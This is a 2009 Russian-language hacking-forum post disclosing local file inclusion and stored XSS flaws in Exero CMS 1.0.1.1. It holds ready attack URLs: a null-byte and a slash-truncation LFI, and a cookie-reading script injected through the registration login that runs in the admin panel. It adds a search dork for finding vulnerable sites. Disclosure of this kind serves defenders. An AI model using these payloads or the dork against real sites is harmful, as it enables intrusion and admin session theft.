ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости > Сценарии/CMF/СMS
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

Exero CMS 1.0.1.1 Multiple Vulnerabilities
  #1  
Старый 13.04.2009, 22:38
Аватар для Spyder
Spyder
Members of Antichat - Level 5
Регистрация: 09.10.2006
Сообщений: 1,698
Провел на форуме:
9098076

Репутация: 4303


По умолчанию Exero CMS 1.0.1.1 Multiple Vulnerabilities

Exero CMS 1.0.1.1 Multiple Vulnerabilities

1) Local File Inclusion

Need: magic_quotes_gpc=off
Файл: index.php
PHP код:
if(empty($_REQUEST['module'])) {
    include(
"modules/".$ecms->settings['defaultmod']);
} else if(
file_exists("modules/".$_REQUEST['module']."/index.php")) {
    include(
"modules/".$_REQUEST['module']."/index.php");
} else {
    include(
"themes/$theme/errors/404.php");

Собственно инклуд тут в двух местах

www.site.com/index.php?module={INC}%00
и
www.site.com/index.php?module=not_exist_module&theme={INC}%00

Для второго случая наличие magic_quotes_gpc=off не обязательно, обходим известным способом со слешами
www.site.com/index.php?module=not_exist_module&theme={INC} {/ x 4096}


2) XSS

XSS в коментарии к новосятм
Файл: /modules/news/index.php

XSS при регистрации. Указываем в логине <script>alert(document.cookie)</script>
Файлы подверженые уязвимости:

/modules/community/members.php
PHP код:
$getuserinfo $db->query("SELECT * FROM users");
while(
$userinfo $db->fetch_array($getuserinfo)) {
    
$users[$users['rowcount']] = $userinfo;
    
$users['rowcount']++;

/admin/users.php
PHP код:
$getusers $db->query("SELECT * FROM ".TABLE_PREFIX."users ORDER BY uid ASC");
    while(
$userinfo $db->fetch_array($getusers)) {
        
print_multicol_row(array($userinfo['username']."[align:left]"=>"","<a href=\"users.php?do=edit&user=".$userinfo['uid']."\">Edit</a>, <a href=\"users.php?do=delete&user=".$userinfo['uid']."\">Delete</a>[align:right]"=>"140"));
    } 
т.е xss будет прямо в админке

dork: "Powered by Exero CMS"
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
VUEngine 2.2 Multiple Vulnerabilities Spyder Сценарии/CMF/СMS 0 13.04.2009 22:36
CMS vs "изготовление на коленках" vadim_samoilov Чужие Статьи 8 19.08.2008 02:10
Symantec Scan Engine Multiple Vulnerabilities NeMiNeM Forum for discussion of ANTICHAT 1 25.04.2006 18:08
osTicket <= 1.3.1 Multiple vulnerabilities Rebz Мировые новости 0 03.07.2005 13:13



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ